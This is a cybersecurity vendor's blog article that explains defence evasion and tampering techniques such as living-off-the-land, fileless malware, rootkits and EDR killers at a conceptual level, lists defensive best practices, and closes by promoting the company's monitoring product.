Most organisations are familiar with prominent cybersecurity threats such as phishing, ransomware, and insider threats. While they focus on addressing these well-known dangers, a more subtle menace is growing at an alarming pace: defence evasion and tampering. These techniques enable attackers to infiltrate an organisation stealthily, take down its defences, and compromise systems – often going unnoticed until it’s too late.
As organisations invest in security tools and monitoring capabilities, adversaries aren’t simply breaking through the front door; they focus on being invisible to the security cameras – and they’re becoming experts at bypassing and disabling security controls so they can walk right past them. The result? A growing threat where traditional defence architectures are increasingly blind to sophisticated attacks.
Understanding defence evasion and tampering
To understand the importance of this threat, let’s break down the terms.
MITRE defines defence evasion as “techniques that adversaries use to avoid detection throughout their compromise”. In other terms, adversaries use defence evasion techniques to hide their presence and malicious activities from the security tools designed to catch and stop them. Techniques range from disguising malicious code to using legitimate tools in harmful ways.
Tampering goes a step further. It involves altering, disabling, or corrupting security tools to disrupt them and make them ineffective. For example, attackers can modify or delete system logs to hide their activities from security products or disable antivirus programmes altogether. In the MITRE ATT&CK framework, tampering is “impairing defences”. Defined as techniques used “to hinder or disable defensive mechanisms”, it falls under the broader Defence Evasion category.
Defence evasion and tampering techniques are often used together. Picture an intruder not only sneaking past a building’s security cameras but also wearing an employee uniform to blend in, turning off the alarms, and erasing all footage of their presence. This is the level of sophistication we’re dealing with.
What makes these attacks particularly dangerous is their dual nature. First, they allow attackers to operate undetected within compromised environments. Second, and perhaps more critically, they tamper with the very security tools designed to detect them.
But how is this possible? Defence evasion and tampering techniques are largely feasible because malware operate within the same environment as defence solutions. By running at the same level, malware can exploit the same permissions and resources that defences rely on, such as modifying system files or altering processes. Additionally, this proximity means malware can directly observe, interact with, and manipulate security systems, creating a critical vulnerability in cybersecurity defences.
Why malware defence evasion and tampering is a growing threat
Defence evasion is not new. Attackers have always been interested in staying under the radar to achieve their objectives without interference from defenders. However, defence evasion through tampering is a growing problem.
A report published last year showed that 70% of malware now employs stealth-oriented techniques to make detection more challenging for defenders. It revealed an even more alarming trend: a 333% YoY increase in malware capable of impairing defences such as next-gen firewalls, antivirus and EDR solutions. The report highlighted,
“A year ago, it was relatively rare for adversaries to disable security controls. Now, this behaviour is seen in a quarter of malware samples and is used by virtually every ransomware group and Advanced Persistent Threat (APT) group.”
Several factors contribute to this growing trend:
- Increasing sophistication of adversaries: As technological innovation around defensive technologies has increased, so has attackers’ sophistication of techniques to evade and impair defences. Threat actors and APT groups invest heavily in developing tools and techniques that can outsmart traditional security measures.
- Broader accessibility of tools: These once-exclusive capabilities are now widely available on dark web marketplaces. This commodification of advanced attack tools has made sophisticated evasion techniques accessible to a broader range of attackers, enabling even less-skilled attackers to use them.
- Growing infrastructure complexity: Modern IT environments, with their mix of cloud services, virtualised systems, and remote work infrastructure, create perfect conditions for evasion. They are harder to monitor comprehensively, creating blind spots that adversaries can exploit.
Common scenarios and techniques
Threat actors use a complex arsenal of techniques. By understanding the tactics they employ, organisations can remain vigilant and identify the most effective measures and tools to thwart defence evasion and tampering attempts. Here are some examples of the most prevalent scenarios and techniques.
Living-off-the-Land attacks
In Living-off-the-Land attacks, also known as LOTL or LOLbins, adversaries leverage existing, legitimate software within a target environment to carry out their activities. Instead of using external malicious files or scripts, they execute their payloads using native system tools like PowerShell, Windows Management Instrumentation (WMI), or remote desktop protocol (RDP). Since these techniques don’t introduce new files or programmes into the system, LOTL attacks don’t trigger alerts from traditional security tools designed to monitor and block unfamiliar or suspicious external programmes, and can operate undetected for extended periods.
Fileless malware
A fileless malware resides entirely in a system's memory rather than being stored on the disk. The malware typically exploits vulnerabilities in system processes or applications and runs without leaving any lasting footprint. This enables it to bypass traditional file-based and signature-based antivirus and endpoint detection systems, as there are no files to scan or flag. Its use of legitimate system functions and ephemeral nature make it to difficult to detect and identify once executed.
Rootkits
Rootkits are malicious tools designed to provide attackers with privileged access to a compromised system while hiding their presence. They often work by altering core system functions, such as the kernel (i.e., the brain of the system). Once installed, rootkits can conceal files, processes, or network connections, allowing adversaries to maintain control over the system and evade detection from security tools or system administrators. Rootkits can disable or interfere with endpoint detection and response (EDR) solutions, making them particularly dangerous in long-term, stealthy attacks where threat actors want to maintain persistent, undetected access to critical systems.
EDR Killers
EDR killers’ purpose is to disable or evade EDRs, which are essential for detecting and responding to malicious activity on endpoints. Adversaries often use a variety of techniques to target and bypass these systems, such as injecting malicious code into EDR processes, exploiting vulnerabilities in the EDR software, or using anti-EDR evasion tools to disable the monitoring mechanisms. EDR killers are increasingly popular among threat actors due to their ability to neutralise a key layer of defence. Notable ransomware operators, such as FIN7, RansomHub and Qilin, have weaponised EDR killers to hinder detection capabilities. The black market for these evasion kits is flourishing, and listings for EDR killer tools can be found on the dark web.
These are just a few examples and the MITRE ATT&CK framework provides a detailed list of known, specific defence evasion techniques. Yet, they underscore the urgency for organisations to evolve their security strategies and tools.
How to detect and mitigate defence evasion and tampering
To detect and mitigate attacks using defence evasion and tampering, organisations must implement proactive strategies and robust technologies. Here are five best practices to adopt.
1. Implement a defence-in-depth strategy
There is no such thing as a silver bullet in cybersecurity. Above all, a robust and comprehensive defence-in-depth strategy, with multiple layers of protection, is crucial. The guiding principle of this strategy is the idea that a single security product cannot fully safeguard an environment from every attack it might face. However, implementing multiple security controls allows to detect threats and prevent data breaches more effectively. If one line of defence is compromised, others will be in place to ensure threats don't slip through the cracks. This minimises the risk of threats bypassing all defences and provides additional time to detect and respond.
2. Ensure continuous, real-time monitoring
Attackers using defence evasion and tampering techniques often exploit gaps in visibility created by periodic monitoring solutions. They may execute malicious actions – like disabling security tools, modifying logs, or injecting code – and revert the system to its original state before the next snapshot, leaving no trace. Continuous, real-time monitoring eliminates these blind spots by capturing all activity as it happens. This ensures that unusual and suspicious behaviours are detected immediately, allowing security teams to investigate and respond without delay. This real-time visibility is essential for catching sophisticated threats that aim to exploit even the smallest window of opportunity.
3. Leverage advanced threat detection tools
Modern threats require modern tools. Traditional security tools alone – such as antivirus, firewalls, and endpoint protection platforms (EPP) – are no longer sufficient. Organisations must invest in advanced threat detection systems that focus on identifying Tactics, Techniques and Procedures (TTPs) used by adversaries, rather than static databases of malware signatures, to detect threats. Unlike signature-based detection tools, they can detect subtle signs of an attack and help uncover malicious actors trying to bypass defences. Importantly, modern security tools should be tamper-resistant by design. This means they are built to withstand unauthorised access or modification, ensuring that attackers cannot easily disable or evade them. For instance, security systems which run within the environment they need to protect (e.g., within the endpoint itself), at the same level as attackers, are not tamper-resistant by design. They may have anti-tampering mechanisms in place, but it’s a cat-and-mouse game where the one with the most sophisticated technique wins.
4. Employ integrity monitoring
Integrity monitoring helps detect unauthorised changes to critical files, configurations, and system settings. Adversaries increasingly operate at the kernel level to gain deeper control and evade detection. Kernel integrity monitoring is crucial in these cases, as it tracks changes to the core components of the operating system, ensuring they remain unaltered by malicious actors. Real-time alerts from integrity monitoring tools allow security teams to quickly identify and respond to stealthy malware, whether at the application layer or deep within the system’s kernel, preventing attackers from gaining persistent control.
5. Ensure timely patching and updates
Last but not least, keeping systems and software up to date is a fundamental part of good cybersecurity hygiene. While timely patching does not directly address the detection of defence evasion and tampering, it helps close the door to such attempts by eliminating known vulnerabilities that attackers could exploit. Regular updates ensure that security gaps are patched promptly, making it harder for attackers to find entry points or exploit outdated defences. By maintaining an up-to-date environment, organisations can reduce their risk exposure and avoid making it easier for attackers to bypass security measures.
With such capabilities and strategies, organisations can strengthen their defences against advanced threats that use defence evasion and tampering techniques, ensuring that even the most sophisticated attackers have limited opportunities to succeed.
Why organisations must act now
With so many security threats to address and limited budgets to allocate, why should organisations place these threats at the top of their agenda? The answer is simple: because they are the hardest to detect and potentially the most damaging ones.
The rising prevalence of defence evasion and tampering techniques demands immediate attention. What makes these techniques so dangerous is their role as enablers, allowing threat actors to orchestrate successful attacks and data breaches. The consequences can be devastating, affecting organisations in several ways:
- Extended breach durations: Attackers who successfully evade detection can linger within an organisation’s infrastructure for weeks or months, gathering data and escalating their attacks. According to IBM’s Cost of a Data Breach Report, the average time to identify a cyber attack in 2024 is 194 days – more than half a year.
- Operational disruptions: Tampered security systems may fail when needed most, leaving organisations vulnerable during critical incidents and making it difficult to investigate and respond to threats.
- Financial losses: The cost of remediating a breach, coupled with potential fines for regulatory non-compliance, can cripple businesses. The IBM report also revealed that the global average cost of a data breach reached $4.88 million in 2024.
- Reputational damage: A high-profile breach can erode customer trust, causing long-term harm to an organisation’s brand.
At a time when the stakes have never been higher, prioritising defences against these techniques is not just prudent – it’s essential for long-term resilience.
How Ryzome can help
At Ryzome, we help organisations fight against these elusive threats. Our solution, Ryzome Security Monitor, provides an essential and complementary layer of security for your business-critical virtual machines and reduces risk in your cloud and virtual environments, which are prime targets for modern attacks.
Ryzome Security Monitor’s capabilities provide you with:
- Continuous, real-time visibility that instantly alert you on malicious activity related to defence evasion.
- The detection of exploits against the kernel, which allow attackers to bypass your security mechanisms and can lead to a complete system compromise and data breach.
- A record of artifacts (i.e., the residual traces left behind by the actions of attackers), often successfully deleted without the right tools in place, to help you investigate and respond to incidents effectively.
Notably, Ryzome Security Monitor’s architecture and implementation makes it inherently resistant to defence evasion and tampering – by design, not just as an added feature. A decisive factor in the battle against advanced threats that employ sophisticated techniques to bypass and impair defences.
Contact us for a demo to see how Ryzome can detect threats capable of sidestepping existing security mechanisms.
